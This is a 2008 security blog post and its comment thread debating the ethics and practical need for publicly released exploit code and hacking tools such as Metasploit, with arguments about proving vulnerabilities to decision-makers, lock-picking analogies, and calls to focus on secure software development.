Tuesday, October 28, 2008

Thoughts on why we need exploit code and hacker tools

Dean made a comment in the SILC channel about a student who:

"student thinks its terrible to release tools, exploits, etc...he says it makes it too easy for people to attack America"

Its not the first time I've heard that argument, but after a few weeks in the new gig I have newfound understanding for the need to provide "absolute proof" of exploitation or the ability to exploit something.

So while on one hand I understand that exploit code and tools allows bad guys to do what they do on the other hand you have people that require you as their security person to show them with absolute certainty something happened or something could happen. Otherwise there is no "proof." And if I need to show proof to get a problem fixed, mitigated or policy changed or put in place its nice to have the ability to do that.

Thoughts?

9 comments:

  1. Hi Chris, I've been following your blog for a while and thought I'd comment on this one - it raises some huge issues that have been debated over and over again:

    Unfortunately this is a human problem. Comparing it to physical security; if I buy a very expensive lock for my house I'll believe it is secure and would probably have been told as much by the locksmith I bought it from. If someone then tells me that it can be easily bypassed or opened, I will require proof of the fact before I believe it. I'll require it even more because someone I respect has already told me it is secure.

    An object lesson is hard to beat, and a demonstration of slipping the lock or using a bump key on it will provide the proof required as plain as day. In a way, we can compare intrusion tools and exploits to lock picks and lock bypass equipment. Do we make them illegal? No, even if there were laws restricting these tools to licensed owners (locksmiths/security professionals) it is trivial for anyone to build their own. It is infinitely more important to secure things more efficiently than it is to restrict the use of the tools to defeat the security.

    Having said that however, security (whether physical or electronic) is almost always going to be a compromise between cost and probability of intrusion. Do I buy that very expensive lock for my house and accept the fact that the intruder can just break a window? Do I put bars on my windows and accept the fact that the door can effectively be kicked in? Do I revamp the door with a metal frame, only to find that the lock can be bypassed in some obscure manner anyway? ... do I hire that professional pen-tester to secure our network as best he can or do I trust our sysadmin to do his best? Do I secure my house like I do a bank vault? Do I secure my computer network like a government facility? In any case, how do I protect against an ignorant employee clicking on a flashy popup from his work computer?

    Sure, not providing ready made tools and exploits may make it more difficult for the mal-intentioned to break into things, but only in a fictional utopian society would "difficult" mean the same thing as "secure".

    ReplyDelete
  2. Great points nick, especially the point about 'how much security is enough'. Cost vs. Security/Risk vs. Productivity seems to be an ongoing mantra.

    The ability to demonstrate a weakness or vulnerability in existing security controls has a definite impact on the asset owner. My previous post on the web app pentest had just that effect on the client.

    My comment about the student and their opinion came about from a discussion on the ethics or social responsibility of releasing tools, scripts, frameworks and exploit code that either publicizes a vulnerability or makes it easier for an attacker to gain access to their target system.

    Both sides of the argument carry weight. I lean towards the side of responsible disclosure and believe that disclosure requires vendors not only to fix existing vulns but also to take security into account going forward. It also spurs research and development in all areas of security.

    The argument that I think is based on a 'knee-jerk' reaction is the one of 'it makes it easier for attackers to target us'. Placing limitations on researchers and security professionals because of the possible threat posed by the tools, etc... can be likened to the gun control argument. Germany and the UK's laws on this are draconian at best and really don't stop the development or use of these tools. It only pushes them underground.

    The argument of these exploits and tools being used to help the criminal also has weight but the reality is that level of communication and research I see amongst malware authors and the organizations behind them far, far exceeds anything we are capable of. Right now the people focusing on defending against these threats are playing catch up. I can only imagine the gap if they were to be regulated and have their resources limited.

    This will always be an ongoing argument/discussion but it's always good to revisit it and hear fresh perspective.

    ReplyDelete
  3. just to clarify I am in the "we should have tools and code" camp.

    on the physical security example nick gave, I think you are right. Adding all that additional stuff to you house increases the level of sophistication required by the attacker or the ability to detect them (you didn't specifically mention alarm system but i don't think its a stretch).

    Network Security is the same way, we harden, ACL, Firewall and monitor, things still get in, users still click on things but the idea is with the monitor we catch the user stuff and we have (hopefully) increased the necessary sophistication of the attacker in order to by pass the other measures.

    Anyway, what spurred all of this was forensics finding evidence of pwdump on a box by finding the registry key and someone above us asking for proof that pwdump was run! despite the fact there was a registry key entry :-(

    ReplyDelete
  4. CG - I've had the exact same thing happen. A system is missing patches. Known to be vulnerable. But if there isn't a particular exploit in metasploit/core/canvas or elsewhere and if I don't have the time or skill to reverse engineer the vuln and write an exploit, then the system owner considers it a low priority event and remains unpatched. Yet in events when I could demonstrate, things got fixed much faster. You'd like to think that people are smarter, but they are not and are trying to balance risk vs productivity along with resource allocation and use. But the attackers don't care about risk and productivity matrices, and are happy to take advantage of an organization following the wrong practices. As assessors and pentesters, we need tools and exploits to more effectively do our work, despite the other pain that public exploits may cause.

    -cw

    ReplyDelete
  5. The public release of code does change the risk. Using a tool such as metasploit will incentivize clients into patching. due to it's ease of use. For example MS08-067 on SP3 isn't trivial to exploit, for the average sys admin; untill you introduce metasploit. As a pen-tester public code helps to illustrate risk, but often that risk is a consequence of said code. You need to look at the threat actors to an organisation; tools such as metasploit widen that pool of actors significantly.

    Catch 22…

    ReplyDelete
  6. Guns, knives and ropes can all be used to kill.

    If you give someone a tool, it's always their decision on how they use it.

    ReplyDelete
  7. There will always be value in proving you can get in and proving that something is broken.
    I don't think restricting them will cause any good, as would banning them. There is a good discussion on a recent podcast of risky business, with Marcus Ranum of tenable networks, who makes some good points. I think using a tool with no idea what it is doing or how it is exploiting that vulnerability makes you no more than a script kiddie. Like a Chef not knowing what goes well together and just following a recipe is bad.
    But there is also valuable in pointing out flaws in the design, not just in some obscure server or software flaw.

    ReplyDelete
  8. there is a major difference between metasploit and lock bypass equipment. one is a virtual, unlimited resource and the other is a physical, finite resource.

    security has nothing directly to do with writing exploits or using exploitation frameworks. indirectly, this sort of "evil" software can be used for verification that a vulnerability gives threats access to assets ("good" software).

    somebody, at some point, needs to independently evaluate "good" software with "evil" software. they can't prove anything though, and their work is never done. there never is any "proof" of anything -- that's a fallacy. your eyes will always deceive you because they can always be deceived.

    metasploit was great at inception, but some of this has gone too far. the point of raising awareness of software weaknesses was enough for me when i read aleph1's paper on smashing the stack in 1996. it takes a long time for others to be convinced for some reason. these people shouldn't be decision-makers for security at large, profitable companies or important government organizations.

    at some point, our industry will abandon CISSP and move to a new "path" for risk expertise that resembles the paths of an accountant, lawyer, or doctor. our industry is just as important as those industries (finance, law, and medicine) because of the dangers and risks involved to humanity at the individual, sociological, and economical levels. you don't see accountants recommending clients to put cash under mattresses, judges no longer cut off hands or fingers, and doctors don't employ leeches any longer. standards and practices change over time as we learn better ways of doing things. maybe a doctor will amputate a limb, but only as a last-ditch effort, typically never as a first-strike.

    i believe that we are already well on our way to a more formal set of standards and practices that are well accepted by the world. i think that a majority of the boards of directors for companies have heard of application security today thanks to gartner and the burton group, as well as booz allen hamiton, cigital, and even sans (but also many others). if you look at what is happening in our military and government, there are some significant changes lately.

    i was fortunate to have worked at ebay, where i brought in at-stake in 2001 to do risk analysis and code review. at that time, responsible disclosure and exploitation tools were also hitting the scene. our industry needed everything we could get our hands on at the time.

    today, these aspects still ring true, but the criminal element has changed significantly. instead of targeting only banks and e-commerce, everyone is now a target. worms and titan rain came on the scene between 2001-2003, which also changed our industry a lot. today, i question whether it's better to spend my time and energy on network pentesting, writing exploits, or even finding vulnerabilities and reporting them via responsible disclosure -- rather than spending it on fixing the root-causes of our problems. i'm talking about software assurance.

    if you are considering a path in exploitation, i highly suggest learning about the history before jumping into things. even "experts" like dan kaminsky still don't get it... even he has a lot to learn.

    most of the problems in our industry are because the "old-timers" at large companies and important organizations have not accepted the fact that applications present inherent risks in the form of software weaknesses. proving anything to these people is a waste of time, much like coding an 80-year old dying patient with a 40-year history of heart problems is not going to accomplish much, at least not for long.

    don't cater to these people. instead, start a software assurance program or teach a young developer how to code securely. you are wasting your time.

    i do not think that metasploit is an "evil" project. it's a great learning tool, to be used in a lab or training environment. we need more security professionals who know metasploit and how to create exploits (it's part of the independent evaluation process we need for application security verification). but we don't need them "proving" anything.

    thanks.

    ReplyDelete
  9. Andre,
    insightful comments as usual. thanks!

    ReplyDelete